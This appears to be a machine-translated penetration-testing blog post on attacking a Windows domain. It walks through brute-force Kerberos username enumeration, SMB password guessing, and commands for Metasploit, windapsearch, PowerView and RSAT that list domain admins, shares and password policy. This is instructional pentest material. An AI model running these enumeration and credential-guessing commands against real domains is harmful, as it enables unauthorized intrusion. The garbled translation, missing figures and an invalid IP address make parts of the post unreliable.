Hacking Book | Free Online Hacking Learning


from brute force enumeration of users to getting all information of domain

Posted by truschel at 2020-02-27

In the process of Intranet penetration, we will encounter the situation that there is a Windows domain environment. When we obtain the permissions of an intranet host, the host may not join the domain, and we cannot directly obtain the relevant information in the domain through this host. How is domain penetration?

We can obtain the permissions of ordinary users in a domain through phishing, spoofing, information collection, password guessing, etc. Let's see how to brutally enumerate the user names in the domain.

Brute force enumeration user name

If we don't know the information in the domain, we don't have the host permission in the domain or the account information of users in the domain, then we can enumerate the account names in the domain by using the dictionary.

For user name enumeration, it is necessary to distinguish whether the user name is correct according to the following error information:

Here are a few tools to do this.


Download address:


The enumeration command is as follows:

Java –jar kerbguess.jar –r [domain] –d [user list] –s [DC IP]

Nmap krb5-enum-users NSE Script

usage method:

nmap –p 88 –script-args krb5-enum-users.realm=’[domain]’,userdb=[user list][DC IP]

Metasploit's modules:

The module information is as follows:


Using this module, we need to provide three parameters:

1. Domain name

2. Domain control IP (rhost)

3. User? List

The result after running run is as shown in the figure:

After running, the results will be saved in the database of Metasploit, and the existing users can be viewed by entering the command creds.


Enumerate user credentials

You can use Metasploit's auxiliary / scanner / SMB / SMB login to enumerate the user's password credentials. The help is as follows:


Get user information in domain

After the above operations, we may have obtained one or several domain user credentials. In this case, we do not need to use violent enumeration to obtain user information as before. We can use the user's identity in the domain to search the data we want in the domain database in a fair way.

The following are our objectives:

1. Get user account

2. Get user rights information (such as domain Admin Group or remote desktop management group)

3. Enumerate domain password policies

4. Get further attack path

Here are a few tools to meet the above requirements.


Download address:


This tool is written in Python and can query user, group and computer information through domain controlled LDAP service. The commands are as follows:

windapsearch --dc-ip [IP_ADDRESS] -u [DOMAIN]\USERNAME -p [PASSWORD] -U

-The meaning of the U parameter gets all users in the domain, for example:


windapsearch --dc-ip -u mydomain\ops -p Pa55word -U | grep cn: | cut -d " " -f 2

We can use grep and cut to clean up some information. The results are as follows:

Use the - Da parameter to get the members of the Domain Admins group:

-da domain admins

windapsearch –dc-ip -u mydomain\ops -p Pa55word --da | grep cn: | cut -d " " -f 2

Use the - M parameter to get members of the remote desktop group:


windapsearch --dc-ip -u mydomain\ops -p Pa55word -m "Remote Desktop Users" | grep CN=


Everyone is familiar with this tool. There are many people using it. Blog:


We need to use runas and / netonly to establish a PowerShell session started by a domain user on a host that is not joined to the domain:

runas /netonly

runas /netonly /user:mydomain\op powershell

We need to enter the password in the pop-up box:

Now that we have installed PowerPoint, the path is as follows:


We import powerplot module:

Import-module .\PowerSploit.psd1

We use the following command to export domain users:

Get-DomainUser -Domain mydomain.test -DomainController | findstr samaccountname

Use the following command to export Domain Admins group members:

domain admins

Get-DomainGroupMember -identity "Domain Admins" -Domain mydomain.test -DomainController | findstr MemberName

Use the following command to export members of the remote desktop management group:

Get-DomainGroupMember -identity "Remote Desktop Users" -Domain mydomain.test -DomainController | findstr MemberName

We can also use the identity of the current user to query the list of shares that he can access:

Find-DomainShare -CheckShareAccess -Domain mydomain.test -DomainController

RSAT (Microsoft remote service management tool)

The purpose of Microsoft RSAT is to let administrators manage Windows Servers remotely. This tool is similar to the above one. First, create a PowerShell session with normal user rights in the domain, and then execute the following command to obtain the domain password policy:

Get-ADDefaultDomainPasswordPolicy -Server 192.1685.5.1

We can also use the rast interface program and use runas to start:


runas /netonly /user:mydomain\ops mmc

Let's use this method to add hosts or users to the domain:

Change the domain controller instance to our target:

Let's take a look at the user information in the domain:

Reference link